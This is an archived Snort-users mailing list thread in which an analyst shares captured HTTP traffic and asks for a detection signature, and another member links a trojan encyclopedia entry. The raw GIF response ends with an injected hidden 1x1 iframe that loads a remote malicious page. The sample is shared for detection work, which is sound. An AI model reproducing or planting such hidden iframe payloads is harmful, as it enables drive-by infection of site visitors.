[Snort-users] iFrame's in gifs

rmkml rmkml at ...1855...
Fri Jun 24 18:24:01 EDT 2011


Hi James,
Maybe: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan:Win32/Jpgiframe.A
Regards
Rmkml


On Fri, 24 Jun 2011, Lay, James wrote:

> Hey all!
>
> Anyone got any leads on this or a sig for this?  Excitement below..I
> have full pcap as well as the original image if anyone wants um.
>
> James
>
> Sanitized headers
>
> GET /img/ HTTP/1.1
> Cookie: <snip>
> Host: magazine.gem-fashion.com
> Accept: */*
> Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
> Accept-Language: en-us
> UA-CPU: x86
> Connection: Keep-Alive
>
> HTTP/1.1 404 Object Not Found
> Date: Fri, 24 Jun 2011 21:15:39 GMT
> Server: Apache
> X-Powered-By: PHP/5.2.11
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma: no-cache
> Set-Cookie: <snip>; path=/
> Content-Length: 1221
> Keep-Alive: timeout=5, max=99
> Connection: Keep-Alive
> Content-Type: image/gif
>
>
>
> GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
> ....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.....
> ....TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.
> ............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
> .a
> .I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B..
> .....I..H...9P....n%3
> ....7E...B..-B...
> JhC..H...G...TaX at ...15318...%. at ...846...!.........l.0.L....3n.r
> .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:.. at ...15319...#?.r.
> .....\x.."L.7..6M..-..?r.. at ...2568...
> ..Q]b.......H4.3....&.........^|X.A..s./g........
> Y.....O...P.)... at ...979...;..r.p..6y....^..;,w.....i...4..p.x..I..E
> ...).<2
> .......$...... ^.2.vo....`.(..y...B
> M<..1
> ...dm)....y0.~.. ..D...Cs
> .'B.#LD.w?..A.F.......b.....4d.0.5..`..9%..... at ...15320...
> .!e.U^.Z..  .. at ...846...@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
> b.....B..4;.D.r7........P
> eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2. at ...15321...~
> ......
> .!..
> !p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$..
> ..q.\....7D..
> ..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
> src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
> style='visibility: hidden;'></iframe>
>
> ------------------------------------------------------------------------------
> All the data continuously generated in your IT infrastructure contains a
> definitive record of customers, application performance, security
> threats, fraudulent activity and more. Splunk takes this data and makes
> sense of it. Business sense. IT sense. Common sense..
> http://p.sf.net/sfu/splunk-d2d-c1
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>
> Please see http://www.snort.org/docs for documentation
>




More information about the Snort-users mailing list